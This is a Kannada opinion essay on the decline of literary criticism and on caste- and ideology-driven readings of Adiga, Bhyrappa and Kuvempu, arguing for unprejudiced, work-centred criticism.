ಸಾಹಿತಿಯ ಧೋರಣೆ ಪರಿಗಣಿಸಬೇಕಿಲ್ಲ!

ಚರ್ಚೆಯ ವಿಷಯಕ್ಕೆ ಸಂಬಂಧಿಸಿದಂತೆ ಸಂಪಾದಕೀಯ ವಿಭಾಗದವರು ವಿವರವಾಗಿ ಕೊಟ್ಟಿರುವ ಅಂಶಗಳನ್ನು ಆಧರಿಸಿ ಅದೇ ಕ್ರಮದಲ್ಲಿ ಅವುಗಳಿಗೆ ನನ್ನ ಅಭಿಪ್ರಾಯಗಳನ್ನು ತಿಳಿಸಿದ್ದೇನೆ:

ವಿಮರ್ಶೆಯ ಪ್ರಕಾರ ಸೊರಗಿದ್ದು ಏಕೆ?

ಇದಕ್ಕೆ ಕಾರಣ ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಸೋಗಲಾಡಿತನ ಅಲ್ಲ. ಮೊದಲಿನಿಂದಲೂ ವಿಮರ್ಶೆ ಯಾರಿಗೂ ಬೇಡವಾದ ಕೂಸು. ನವೋದಯ ಕಾಲದಿಂದ ಇಲ್ಲಿಯವರೆಗೆ ವಿಮರ್ಶೆಗೆ ಓದುಗರು ಕಡಿಮೆಯೇ. ಈಗ ಇದು ಇನ್ನಷ್ಟು ಹೆಚ್ಚಾಗಿರಬಹುದಷ್ಟೆ. ವಿಮರ್ಶೆಯ ಕೃತಿಗಳಿಗೆ ಪುಸ್ತಕದ ಮಾರುಕಟ್ಟೆಯಲ್ಲಿ ಬೇಡಿಕೆ ಇಲ್ಲವಾಗುತ್ತಿದೆ. ಎಷ್ಟೇ ಉತ್ತಮ ವಿಮರ್ಶೆಯಾದರೂ ಅದು ಆಯಾ ವಿಮರ್ಶಕನ ವೈಯಕ್ತಿಕ ಅಭಿಪ್ರಾಯವಷ್ಟೇ ತಾನೇ? ಒಂದು ಕೃತಿಯನ್ನು ಓದಿದ ಪ್ರತಿಯೊಬ್ಬ ಓದುಗನಿಗೂ ಅವನ ಸ್ವಂತ ಅಭಿಪ್ರಾಯ ಎಂಬುದು ಇರುತ್ತದೆ. ಅದು ಅಕಾಡೆಮಿಕ್ ವಿಮರ್ಶೆಯ ದೃಷ್ಟಿಯಿಂದ ಸರಿಯಿಲ್ಲದಿರಬಹುದು. ಇತರರು ಬರೆದ ವಿಮರ್ಶೆಯನ್ನು ಮಾನದಂಡವಾಗಿ ಇಟ್ಟುಕೊಳ್ಳಬೇಕಾದ ಅಗತ್ಯವನ್ನು ಒಬ್ಬ ಓದುಗನ ಮೇಲೆ ಬಲವಂತವಾಗಿ ಹೇರುವ ಯಾವ ಅಧಿಕಾರವೂ ವಿಮರ್ಶಕರಿಗೆ ಇಲ್ಲವೆಂದೇ ನಾನು ನಂಬಿದ್ದೇನೆ.

ಇನ್ನು ಎರಡನೇ ಕಾರಣ ಈಗ್ಗೆ ಹತ್ತಿಪ್ಪತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ದಿನಪತ್ರಿಕೆಗಳ ಭಾನುವಾರದ ಪುರವಣಿಗಲ್ಲಿ, ವಾರಪತ್ರಿಕೆಗಳಲ್ಲಿ ಒಂದು ಕೃತಿಯ ವಿವರವಾದ ವಿಮರ್ಶೆಯಿರುತ್ತಿತ್ತು. ಈಗ ಆ ಪುರವಣಿಗಳಲ್ಲಿ ಐದಾರು ಪುಸ್ತಕಗಳ ಹತ್ತು ಸಾಲುಗಳ ಪರಿಚಯಗಳು ಮಾತ್ರವಿರುತ್ತದೆ. ಅದನ್ನು ಆಯಾ ಪತ್ರಿಕೆಗಳ ಸಂಪಾದಕೀಯ ವರ್ಗದವರೇ ಬರೆಯುತ್ತಾರೆ. ವಾರಪತ್ರಿಕೆಗಳು ಈಗಿನ ಕಾಲದ ಯುವಜನತೆಯ ಆಶೋತ್ತರಗಳ ಪ್ರತಿಬಿಂಬವಾಗಿ ಬದಲಾಗಿ ಹೋಗಿವೆ. ಸಿನಿಮಾ, ಫ್ಯಾಷನ್, ಮನೆಗಳ ಒಳಾಲಂಕಾರ, ಹೊಸ ಮಾದರಿಯ ಕಾರು, ಬೈಕುಗಳು ಹೀಗೆ ಪಟ್ಟಿ ಮಾಡುತ್ತಾ ಹೋಗಬಹುದು. ಪತ್ರಿಕೆಗಳ ಉಳಿವಿಗೆ ಇದು ಅಗತ್ಯ. ಇದನ್ನು ತಪ್ಪೆಂದು ಹೇಳಲಿಕ್ಕಾಗುವುದಿಲ್ಲ.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯೆಂದರೆ ಸಮಾಜಶಾಸ್ತ್ರದ ಒಂದು ಉಪ ವಿಭಾಗವಾಗಿ ಹೋಗಿದೆ. ಅದನ್ನು ಓದುವ ದರ್ದು ಒಂದು ಕಥಾಸಂಕಲನ, ಕಾದಂಬರಿ, ಪ್ರಬಂಧ ಸಂಕಲನದ ಓದುಗನಿಗೆ ಅನಿವಾರ್ಯವೆಂದು ಅನಿಸುತ್ತಿಲ್ಲ. ಹೀಗಾಗಿ ಉತ್ತಮ ವಿಮರ್ಶೆಯ ಪ್ರಕಾರ ದಿನೇ ದಿನೇ ಕಣ್ಮರೆಯಾಗುತ್ತಿದೆ.

ಇಂತಹ ಪರಿಸ್ಥಿಯಲ್ಲಿ ವಿಮರ್ಶೆಯನ್ನು ಪತ್ರಿಕೆಗಳ ಮೂಲಕ ಓದಿ ಒಂದು ಮಾನಸಿಕ ಸಿದ್ಧತೆ ಮಾಡಿಕೊಳ್ಳುವ ಅವಕಾಶವೇ ಸಾಹಿತ್ಯಾಸಕ್ತರಿಗೆ ಇಲ್ಲವಾಗುತ್ತಿದೆ. ಕಾಲಕಾಲಕ್ಕೆ ಚಾಲ್ತಿಗೆ ಬಂದ ಸಾಹಿತ್ಯ ಚಳವಳಿಗಳಾದ ಬಂಡಾಯ, ದಲಿತ, ಸ್ತ್ರೀವಾದ, ಸಮಾಜಶಾಸ್ತ್ರೀಯ, ರಾಜಕೀಯ ಶಾಸ್ತ್ರದ ಪರಿಕಲ್ಪನೆಗಳು ಸಾಹಿತ್ಯದ ಪರಿಭಾಷೆಯನ್ನು ಬದಲಿಸಿದವು. ಇವೆಲ್ಲಕ್ಕೂ ಕಳಶವಿಟ್ಟಂತೆ ಸಾಹಿತ್ಯದಿಂದ ಸಮಾಜದ ಬದಲಾವಣೆಯನ್ನು ಮಾಡಬಹುದು; ಬದಲಾವಣೆ ಮಾಡುವುದು ಸಾಹಿತ್ಯದ ಮುಖ್ಯ ಉದ್ದೇಶ ಮತ್ತು ಅಂತಹ ಸಾಹಿತ್ಯವೇ ನಿಜವಾದ ಸಾಹಿತ್ಯವೆಂದೂ ಉಳಿದಿದ್ದೆಲ್ಲಾ ಬೂಜ್ರ್ವಾ ಎಂಬ ಅಭಿಯಾನ ಸುಮಾರು ಎರಡು ದಶಕಗಳ ಕಾಲ ಜೋರಾಗಿಯೇ ನಡೆಯಿತು.

ಹಾಗೆಯೇ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯೆಂದರೆ ಹೀಗೇ ಇರಬೇಕೆಂಬ ಪರೋಕ್ಷ ಒತ್ತಡ ಹೇರಲಾರಂಭಿಸಿದಾಗ ಕೃತಿನಿಷ್ಠ ವಿಮರ್ಶೆಗೆ ಬೆಲೆಯಿಲ್ಲವಾಯಿತು ಹಾಗೂ ಅಂತಹ ವಿಮರ್ಶಕರು ಮೂಲೆಗುಂಪಾದರು. ಈಗ ಈ ವಾದ ಬೆಲೆ ಕಳೆದುಕೊಂಡಿದ್ದರೂ ಪೂರ್ತಿಯಾಗಿ ಮರೆಯಾಗಿಲ್ಲ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯೆಂದರೆ ಸಮಾಜಶಾಸ್ತ್ರದ ಒಂದು ಉಪ ವಿಭಾಗವಾಗಿ ಹೋಗಿದೆ. ಅದನ್ನು ಓದುವ ದರ್ದು ಒಂದು ಕಥಾಸಂಕಲನ, ಕಾದಂಬರಿ, ಪ್ರಬಂಧ ಸಂಕಲನದ ಓದುಗನಿಗೆ ಅನಿವಾರ್ಯವೆಂದು ಅನಿಸುತ್ತಿಲ್ಲ. ಹೀಗಾಗಿ ಉತ್ತಮ ವಿಮರ್ಶೆಯ ಪ್ರಕಾರ ದಿನೇ ದಿನೇ ಕಣ್ಮರೆಯಾಗುತ್ತಿದೆ.

ಅಡಿಗರು, ಭೈರಪ್ಪ, ಕುವೆಂಪು ಮತ್ತಿತರರ ಸಾಹಿತ್ಯ ಏಕೆ ಓದುಗರು ಮತ್ತು ವಿಮರ್ಶಕರ ಒಂದು ಗುಂಪಿಗೆ ಅಪಥ್ಯ?

ಈ ಊಹೆ ನಿಜವೇ ಆಗಿದ್ದರೆ ಇದಕ್ಕೆ ಕಾರಣ ಮೇಲೆ ನಾನು ವಿವರವಾಗಿ ಹೇಳಿದ್ದರಲ್ಲೇ ಇದೆ. ಅಡಿಗರು ತಮ್ಮ ಕವನಗಳಲ್ಲಿ ಪುರಾಣದ ಪ್ರತಿಮೆ, ಪ್ರತೀಕಗಳನ್ನು ಉಪಯೋಗಿಸಿದ ಮಾತ್ರಕ್ಕೆ ಅದು ಶೂದ್ರರನ್ನು ಹೀಯಾಳಿಸಿದರೆಂದು ಅರ್ಥವೇ? ಶೂದ್ರರೆಲ್ಲಾ ಅಡಿಗರ ಕಾವ್ಯವನ್ನು ಬಹಿಷ್ಕರಿಸಿದ್ದಾರೆ ಎಂಬುದಕ್ಕೆ ಆಧಾರವೇನೋ ತಿಳಿಯದಾಗಿದೆ.

ಕಾವ್ಯದ ಓದಿಗೆ ಮತ್ತು ಅದನ್ನು ಗ್ರಹಿಸಲು ಒಂದು ಮಟ್ಟದ ಸಿದ್ಧತೆ ಬೇಕಾಗುತ್ತದೆ. ಆ ಸಿದ್ಧತೆಯಿರುವವರು ಈಗಲೂ ಉತ್ತಮ ಕಾವ್ಯವನ್ನು ಓದುತ್ತಲೇ ಇದ್ದಾರೆ. ಅದರಲ್ಲಿ ಅಡಿಗರ ಕಾವ್ಯವೂ ಸೇರಿದೆ ಎಂದು ಪ್ರತ್ಯೇಕವಾಗಿ ಹೇಳಬೇಕಾಗಿಲ್ಲ. ಅಡಿಗರ ಕಾವ್ಯವನ್ನು ಓದುಗರ ಒಂದು ವರ್ಗ ಬಹಿಷ್ಕರಿಸಿದ್ದಾರೆ ಎನ್ನುವುದಕ್ಕಿಂತ ಈಗ ಅವರ ಕಾವ್ಯವನ್ನು ಓದುವವರು ಕಡಿಮೆಯಾಗಿದ್ದಾರೆ ಎನ್ನುವುದು ಸರಿ ಎಂದು ನನ್ನ ಅಭಿಪ್ರಾಯ.

ಪ್ರಗತಿಪರರಿಗೆ ಭೈರಪ್ಪನವರ ಕಾದಂಬರಿಗಳು ವೈದಿಕಶಾಹಿ, ಧಾರ್ಮಿಕ ಮತಾಂಧತೆ, ಬ್ರಾಹ್ಮಣಶಾಹಿಯ ಪುನರುತ್ಥಾನದ ಹಿಡನ್ ಅಜೆಂಡಾ ಇನ್ನೂ ಮುಂತಾದ ಅನೇಕ ಕಾರಣಗಳಿಂದ ಅಪಥ್ಯವಾಗಿರುವುದು ತುಂಬಾ ಹಳೆಯ ವಿಷಯ. ಅವರ ಪ್ರತಿ ಹೊಸ ಕಾದಂಬರಿ ಪ್ರಕಟವಾದಾಗಲೂ ಟೀಕಾಕಾರು ಪುಂಖಾನುಪುಂಖವಾಗಿ ಭೈರಪ್ಪನವರ ಕಾದಂಬರಿಗಳನ್ನು ‘ಏಕೆ ಓದಬಾರದು’ ಎಂಬುದಕ್ಕೆ ತಾವು ಈ ಹಿಂದೆ ಹೇಳಿದ್ದನ್ನೇ ಪುನರಾವರ್ತನೆ ಮಾಡುತ್ತಾರೆ. ಆದರೆ ಭೈರಪ್ಪನವರ ಹೊಸ ಕಾದಂಬರಿಗೆ ಕಾಯುತ್ತಿರುವ ಅಪಾರ ಓದುಗರ ಸಂಖ್ಯೆ ಹೆಚ್ಚುತ್ತಲೇಯಿದೆ. ಕೇವಲ ಕನ್ನಡವಲ್ಲದೆ ಮರಾಠಿ, ಹಿಂದಿ ಅನುವಾದಗಳ ಮೂಲಕವೂ ಅವರು ಪ್ರಸಿದ್ಧರಾಗಿದ್ದಾರೆ. ಮರಾಠಿಯಲ್ಲಂತೂ ಅವರು ‘ಕನ್ನಡದಲ್ಲಿ ಬರೆಯುತ್ತಿರುವ ಮರಾಠಿ ಲೇಖಕ’ ಎಂಬಷ್ಟರ ಮಟ್ಟಿಗೆ ಮನೆಮಾತಾಗಿದ್ದಾರೆ. ಹಾಗಾದರೆ ಅವರ ಕಾದಂಬರಿಗಳನ್ನು ಓದುವ ಎಲ್ಲರನ್ನೂ ಪ್ರತಿಗಾಮಿಗಳು, ವೈದಿಕಶಾಹಿಗಳು, ಧಾರ್ಮಿಕ ಮತಾಂಧರು ಎಂದು ಹಣೆಪಟ್ಟಿಕಟ್ಟಿ ತಿರಸ್ಕರಿಸಬೇಕು ಎಂಬುದು ಪ್ರಗತಿಪರರ ಆಶಯವೇ?

ಮುಖ್ಯ ಉದ್ದೇಶ ಸಮಾಜದ ಬದಲಾವಣೆ, ಹಿಂದಿನದೆಲ್ಲವನ್ನೂ ತರತಮವಿಲ್ಲದೆ ಟೀಕಿಸಿ ಹೊರಗೆ ಹಾಕುವುದು, ಜಾತಿ ವಿನಾಶ, ಸರ್ವರಿಗೂ ಸಮಬಾಳು, ಸಮಪಾಲು ಇತ್ಯಾದಿ. ಈ ಅಂಶಗಳು ಸಾಹಿತ್ಯದಲ್ಲಿ ಕಡ್ಡಾಯವಾಗಿ ಇರತಕ್ಕದ್ದು.

ಪ್ರಗತಿಪರತೆ ಎಂಬುದು ಸಾಹಿತ್ಯದ, ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಪರಿಭಾಷೆಯಲ್ಲ. ಅದು ಮೊದಲು ಪ್ರಗತಿಶೀಲ ಸಾಹಿತಿಗಳಿಂದ ನಂತರದಲ್ಲಿ ಬಂಡಾಯದವರಿಂದ ಸಾಹಿತ್ಯದಲ್ಲಿ ಚಾಲ್ತಿಗೆ ಬಂದ ರಾಜಕಾರಣದ ಶಬ್ದ. ಇದರ ಮುಖ್ಯ ಉದ್ದೇಶ ಸಮಾಜದ ಬದಲಾವಣೆ, ಹಿಂದಿನದೆಲ್ಲವನ್ನೂ ತರತಮವಿಲ್ಲದೆ ಟೀಕಿಸಿ ಹೊರಗೆ ಹಾಕುವುದು, ಜಾತಿ ವಿನಾಶ, ಸರ್ವರಿಗೂ ಸಮಬಾಳು, ಸಮಪಾಲು ಇತ್ಯಾದಿ. ಈ ಅಂಶಗಳು ಸಾಹಿತ್ಯದಲ್ಲಿ ಕಡ್ಡಾಯವಾಗಿ ಇರತಕ್ಕದ್ದು. ಪ್ರಗತಿಪರತೆಯ ಕೆಲವು ಉದ್ದೇಶಗಳು ಉತ್ತಮವಾದರೂ ಅದನ್ನು ಆಗುಮಾಡಿಸಬೇಕಾದ್ದು ನಮ್ಮನ್ನಾಳುವವರ ರಾಜಕೀಯ ಇಚ್ಚಾಶಕ್ತಿಯನ್ನು ಅವಲಂಬಿಸಿದೆ.

ಸಾಹಿತ್ಯ ಮತ್ತು ಸಾಹಿತಿಯನ್ನು ರಾಜಕಾರಣದ ಒಂದು ಅಂಗವಾಗಿ ಪರಿಗಣಿಸಹೊರಡುವುದು ಸರಿಯೇ? ಸಾಹಿತ್ಯಕ್ಕೆ ಇವನ್ನು ಬಿಟ್ಟು ಬೇರೆ ಉದ್ದೇಶಗಳೇ ಇಲ್ಲವೇ? ಇವರ ಕೆಂಗಣ್ಣಿಗೆ ಭೈರಪ್ಪನವರ ಕಾದಂಬರಿಗಳು ಪ್ರತಿಗಾಮಿ ಎಂದು ಕಾಣುವುದರಲ್ಲಿ ಆಶ್ಚರ್ಯವೇನಿಲ್ಲ. ‘ದಾಟು’ ಕಾದಂಬರಿಯಲ್ಲಿ ಸತ್ಯಭಾಮೆಯೊಡನೆ ಮೋಹನದಾಸನ ಮದುವೆ ಮಾಡಿಸದೆಯಿದ್ದದ್ದು ಭೈರಪ್ಪನವರ ಪ್ರತಿಗಾಮಿತ್ವ, ಬ್ರಾಹ್ಮಣಶಾಹಿ, ವೈದಿಕಶಾಹಿ ಇತ್ಯಾದಿಗಳಿಗೆ ಒಂದು ಉತ್ತಮ ಉದಾಹರಣೆಯಾಗಿ ಪ್ರಗತಿಪರ ಸಾಹಿತಿಗಳಿಗೆ, ವಿಮರ್ಶಕರಿಗೆ ಒಂದು ಅಸ್ತ್ರವಾಗಿದೆ. ಆ ಕಾದಂಬರಿ ಪ್ರಕಟವಾಗಿ ಐವತ್ತು ವರ್ಷಗಳಾಗುತ್ತಾ ಬಂದರೂ ಈ ಅಸ್ತ್ರವನ್ನು ಸಮಯಸಿಕ್ಕಾಗೆಲ್ಲಾ ಪ್ರಯೋಗಿಸುತ್ತಲೇ ಇರುತ್ತಾರೆ. ಆದರೆ ‘ದಾಟು’ವನ್ನು ಗಮನವಿಟ್ಟು ಓದಿದರೆ ಪ್ರಗತಿಪರರ ಈ ಅಸ್ತ್ರವೇ ಹುಸಿಯೆಂದು ತಿಳಿಯುತ್ತದೆ.

ಒಮ್ಮೆ ಆತ ಸತ್ಯಭಾಮೆಯೊಡನೆ ಮಾತನಾಡುವಾಗ, ‘ಹಿಂದೆ ಬ್ರಾಹ್ಮಣರೂ ಸೇರಿದಂತೆ ಮೇಲ್ವರ್ಗದರು ನಮ್ಮ ಕೇರಿಯ ಹೆಂಗಸರಿಗೆ ಈ ಹಿಂದೆ ಮಾಡಿದ ಹಾಗೆ ನಾವು ಅವರ ಹೆಂಗಸರಿಗೆ ಮಾಡಬೇಕು’ ಎಂದು ಹೇಳುತ್ತಾನೆ.

ಒಂದು ಹಂತದಲ್ಲಿ ಸತ್ಯಭಾಮೆ ತಾನು ಮೋಹನದಾಸನನ್ನು ಮದುವೆಯಾಗುವ ಯೋಚನೆ ಮಾಡಿರುತ್ತಾಳೆ. ಆದರೆ ಮೋಹನದಾಸನ ವ್ಯಕ್ತಿತ್ವವೇ ಮೂಲತಃ ಸೇಡಿನದು. ಕ್ರಾಂತಿ ಮಾಡಬೇಕು ಎಂಬ ಯೋಚನೆಯದು. ಇದಕ್ಕೆ ಅವನಲ್ಲಿ ಸಕಾರಣಗಳಿವೆ. ಅದನ್ನು ಕಾದಂಬರಿಯಲ್ಲಿ ಭೈರಪ್ಪನವರು ಸಮರ್ಥವಾಗಿ ಯಾವ ಮುಚ್ಚುಮರೆಯಿಲ್ಲದೆ ಚಿತ್ರಿಸಿದ್ದಾರೆ. ಒಮ್ಮೆ ಆತ ಸತ್ಯಭಾಮೆಯೊಡನೆ ಮಾತನಾಡುವಾಗ, ‘ಹಿಂದೆ ಬ್ರಾಹ್ಮಣರೂ ಸೇರಿದಂತೆ ಮೇಲ್ವರ್ಗದರು ನಮ್ಮ ಕೇರಿಯ ಹೆಂಗಸರಿಗೆ ಈ ಹಿಂದೆ ಮಾಡಿದ ಹಾಗೆ ನಾವು ಅವರ ಹೆಂಗಸರಿಗೆ ಮಾಡಬೇಕು’ ಎಂದು ಹೇಳುತ್ತಾನೆ. ಆಗ ಸತ್ಯಭಾಮೆ ಇಂತಹ ಸೇಡಿನ ಮನೋಭಾವದ ವ್ಯಕ್ತಿಯೊಡನೆ ಮದುವೆಯಾದರೆ ಪ್ರತಿನಿತ್ಯ ಮನಸ್ತಾಪವಾಗುತ್ತದೆ. ಅಂತಹ ದಾಂಪತ್ಯದಲ್ಲಿ ಏನು ಸ್ವಾರಸ್ಯವಿರುತ್ತದೆ ಎಂದು ಆತನೊಡನೆ ಮದುವೆಯಾಗುವ ಯೋಚನೆಯನ್ನು ಮುಂದುವರಿಸುವುದಿಲ್ಲ.

ಗಮನಿಸಬೇಕಾದ ಮತ್ತೊಂದು ಮುಖ್ಯ ಅಂಶವೆಂದರೆ ಈ ಸೇಡು, ಕ್ರಾಂತಿಯ ಮನೋಭಾವದವರಿಗೆ ಸಂಸಾರ, ಮಕ್ಕಳು ಇವೆಲ್ಲಾ ಒಂದು ರೀತಿ ಕಾಲ್ತೊಡಕುಗಳು. ಇಡೀ ದಾಟು ಕಾದಂಬರಿಯಲ್ಲಿ ಭೈರಪ್ಪನವರು ಮೇಲ್ವರ್ಗದ ಪರವಾಗಿ ವಕಾಲತ್ತು ವಹಿಸಿದ್ದಾರೆ ಎಂದು ಈಗಲೂ ನಂಬಿರುವವರು ಶಾಂತಚಿತ್ತರಾಗಿ ಮತ್ತೊಮ್ಮೆ ಆ ಕಾದಂಬರಿಯನ್ನು ಓದುವುದು ಒಳ್ಳೆಯದು. ಸಾಂಪ್ರದಾಯಿಕ ಮಹಾಭಾರತದ ಕಥೆಯನ್ನು ಮೂಲವಾಗಿಟ್ಟುಕೊಂಡರೂ ಸಹ ಅದರ ಎಲ್ಲಾ ಮಿಥ್ ಗಳನ್ನು ಕೈಬಿಟ್ಟು ಪ್ರವಚನ ಮಾಡುವ ಬ್ರಾಹ್ಮಣರಿಗೆ, ಮೇಲ್ವರ್ಗದವರಿಗೆ, ಅರ್ಚಕರಿಗೆ, ಮಠಗಳ ಸ್ವಾಮಿಗಳಿಗೆ ಶಾಕ್ ಕೊಟ್ಟಂತಹ ‘ಪರ್ವ’ ಕಾದಂಬರಿಯನ್ನು ಬರೆದವರೂ ಭೈರಪ್ಪನವರೇ. ಇದನ್ನು ನಮ್ಮ ಪ್ರಗತಿಪರರು ಏಕೆ ಮರೆತಿದ್ದಾರೆ?

ಕುವೆಂಪು ಸಾಹಿತ್ಯವನ್ನು ಮುಕ್ತ ಮನಸ್ಸಿನಿಂದ ಬ್ರಾಹ್ಮಣರು ಒಪ್ಪಿದಂತೆ ಕಾಣುವುದಿಲ್ಲ…

ನವ್ಯ ಸಾಹಿತ್ಯ ಗೋಪಾಲಕೃಷ್ಣ ಅಡಿಗರ ಮೂಲಕ ಪ್ರಾರಂಭವಾದಾಗ ಅವರ ಜತೆಗಿದ್ದವರು ಯು.ಆರ್.ಅನಂತಮೂರ್ತಿ, ರಾಮಚಂದ್ರ ಶರ್ಮ, ವೈ.ಎನ್.ಕೆ. ಮುಂತಾದವರು. ಅವರಲ್ಲಿ ಬ್ರಾಹ್ಮಣರು ಜಾಸ್ತಿಯಿದ್ದರು ಎಂಬುದು ನಿಜ. ನವ್ಯ ಸಾಹಿತ್ಯಕ್ಕೆ ಹೆಚ್ಚಿನ ಪ್ರಚಾರ ಕೊಟ್ಟಿದ್ದೂ ಸಹ ಕನ್ನಡದ ಪ್ರಸಿದ್ಧ ಪತ್ರಿಕೆಯ ಸಾಪ್ತಾಹಿಕ ಪುರವಣಿ. ಅದರ ಸಂಪಾದಕರೂ ಆಗ ಬ್ರಾಹ್ಮಣರೇ ಆಗಿದ್ದು ಕಾಕತಾಳೀಯ. ಹಾಗೆಂದು ಕೇವಲ ಬ್ರಾಹ್ಮಣರು ಮಾತ್ರ ನವ್ಯ ಸಾಹಿತ್ಯದಲ್ಲಿದ್ದರು ಎಂಬುದು ನಿಜವಲ್ಲ. ಬ್ರಾಹ್ಮಣೇತರರೊ ಅಡಿಗರೊಂದಿಗೆ ಕೈಜೋಡಿಸಿದ್ದರು.

ಕುವೆಂಪು ಅವರು ನವೋದಯ ಸಾಹಿತ್ಯದ ಪ್ರಮುಖ ಕವಿ ಎಂಬುದು ಎಲ್ಲರಿಗೂ ಗೊತ್ತಿರುವ ವಿಷಯ. ಆದರೆ ಒಂದು ಹೊಸ ಸಾಹಿತ್ಯದ ಪ್ರಕಾರ ಬಂದಾಗ ಸಾಹಿತ್ಯಾಸಕ್ತರಿಗೆ ಅದರಲ್ಲಿ ಕುತೂಹಲ ಹುಟ್ಟುವುದು ಸಹಜ. ಆಗ ಹಿಂದಿನ ಸಾಹಿತ್ಯ ಪ್ರಕಾರದ ಬಗ್ಗೆ ಗಮನ ಕಡಿಮೆಯಾಗುತ್ತದೆ. ಈ ಎಲ್ಲಾ ಕಾರಣದಿಂದ ಬ್ರಾಹ್ಮಣರು ಕುವೆಂಪು ಸಾಹಿತ್ಯವನ್ನು ಕಡೆಗಣಿಸಿದರು ಎಂಬ ಊಹೆಯನ್ನು ಮಾಡುವುದು ಸಹಜ. ಆದರೆ ಇದು ಸರಿಯಲ್ಲ. ಬ್ರಾಹ್ಮಣರಾದ ಕೆ.ಎಸ್.ನರಸಿಂಹಸ್ವಾಮಿಯವರ ಕವಿತೆಗಳನ್ನು ಗೋಪಾಲಕೃಷ್ಣ ಅಡಿಗರೇ ದಾಂಪತ್ಯ ಕವಿ, ಪುಷ್ಪಕವಿ ಎಂದು ತಮ್ಮ ಒಂದು ಕವನದಲ್ಲಿ ಲೇವಡಿ ಮಾಡಿದ್ದಾರೆ. ಅದಕ್ಕೆ ನರಸಿಂಹಸ್ವಾಮಿಯವರು ಕವನದ ಮೂಲಕವೇ ಉತ್ತರ ಕೊಟ್ಟಿದ್ದಾರೆ.

ಇನ್ನು ಕಾರ್ನಾಡರದು ಮುಖ್ಯವಾಗಿ ನಾಟಕ ಪ್ರಕಾರ ಮತ್ತು ನಟನೆ. ನಾಟಕ ರಂಗಭೂಮಿಯ ಮೇಲೆ ಸಾಕಾರಗೊಳಬೇಕಾದದ್ದು. ಸಮರ್ಥ ನಿರ್ದೇಶಕರಿಂದ ಅವರ ನಾಟಕಗಳು ಪ್ರದರ್ಶನಗೊಂಡಾಗ ಅವು ಅಪಾರ ಜನಪ್ರಿಯತೆಯನ್ನು ಪಡೆದಿವೆ. ಕಂಬಾರರು ನಾಟಕಗಳ ಜತೆಗೆ ಕವನ, ಕಾದಂಬರಿಗಳನ್ನು ಬರೆದಿದ್ದಾರೆ. ಅವರ ಸಾಹಿತ್ಯದ ಬಗ್ಗೆ ವಿಮರ್ಶೆ ಅಷ್ಟಾಗಿ ಬಂದಿಲ್ಲವೆಂಬುದು ನಿಜ.

ಆದ್ದರಿಂದ ಬ್ರಾಹ್ಮಣರು ಬ್ರಾಹ್ಮಣೇತರ ಸಾಹಿತಿಯಾದ ಕುವೆಂಪು ಅವರನ್ನು ಮುಕ್ತ ಮನಸ್ಸಿನಿಂದ ಒಪ್ಪಿದಂತೆ ಕಾಣುವುದಿಲ್ಲ ಎಂಬ ಆರೋಪ ಸರಿಯಲ್ಲ. ಅವರ ಕಾದಂಬರಿಗಳಿಗೆ ಈಗಲೂ ಬೇಡಿಕೆಯಿದೆ. ಪ್ರತಿ ವರ್ಷ ಅವು ಪುನರ್ಮುದ್ರಣಗೊಳ್ಳುತ್ತಿರುವುದೇ ಇದಕ್ಕೆ ಸಾಕ್ಷಿ. ಸಾಹಿತಿಗಳು ಮತ್ತು ಓದುಗರನ್ನು ಜಾತಿ ಕಾರಣದಿಂದ ಬೇರ್ಪಡಿಸುವ ರೀತಿಯೇ ಸರಿಯಲ್ಲ. ಇನ್ನು ಕಾರ್ನಾಡರದು ಮುಖ್ಯವಾಗಿ ನಾಟಕ ಪ್ರಕಾರ ಮತ್ತು ನಟನೆ. ನಾಟಕ ರಂಗಭೂಮಿಯ ಮೇಲೆ ಸಾಕಾರಗೊಳಬೇಕಾದದ್ದು. ಸಮರ್ಥ ನಿರ್ದೇಶಕರಿಂದ ಅವರ ನಾಟಕಗಳು ಪ್ರದರ್ಶನಗೊಂಡಾಗ ಅವು ಅಪಾರ ಜನಪ್ರಿಯತೆಯನ್ನು ಪಡೆದಿವೆ. ಕಂಬಾರರು ನಾಟಕಗಳ ಜತೆಗೆ ಕವನ, ಕಾದಂಬರಿಗಳನ್ನು ಬರೆದಿದ್ದಾರೆ. ಅವರ ಸಾಹಿತ್ಯದ ಬಗ್ಗೆ ವಿಮರ್ಶೆ ಅಷ್ಟಾಗಿ ಬಂದಿಲ್ಲವೆಂಬುದು ನಿಜ. ಇನ್ನಾದರೂ ವಿಮರ್ಶಕರು ಮನಸ್ಸು ಮಾಡಬೇಕು.

ಕೊನೆಯದಾಗಿ ಸಾಹಿತಿಯ ಹಿನ್ನೆಲೆ, ಆತನ ಹಿಂದಿನ ಕೃತಿಗಳು ಮತ್ತು ಪ್ರಕಾಶಿತ ನಿಲುವುಗಳನ್ನು ಬಿಟ್ಟು ಕೃತಿಯೊಂದರಲ್ಲಿ ಅಡಕವಾಗಿರುವ ಸತ್ಯ-ಆಶಯಗಳ ಹುಡುಕಾಟ ಮತ್ತು ಮೌಲ್ಯಮಾಪನ ಮಾಡಬೇಕಾದ್ದೇ ವಿಮರ್ಶಕನ ನಿಜವಾದ ಕೆಲಸ. ಅದು ಸಾಧ್ಯವಾಗಬೇಕಾದರೆ ಆತ ಪೂರ್ವಗ್ರಹಪೀಡಿತ ಆಗಿರಬಾರದು ಮತ್ತು ಸಾಕಷ್ಟು ಓದಿಕೊಂಡಿರಬೇಕು. ನಮ್ಮ ಹಿಂದಿನ ವಿಮರ್ಶಕರು ಇದನ್ನು ಮಾಡಿ ತೋರಿಸಿದ್ದಾರೆ. ಸದ್ಯದ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿ ಇದು ಸಾಧ್ಯವೇ ಎಂಬುದು ಮಿಲಿಯನ್ ಡಾಲರ್ ಪ್ರಶ್ನೆ.

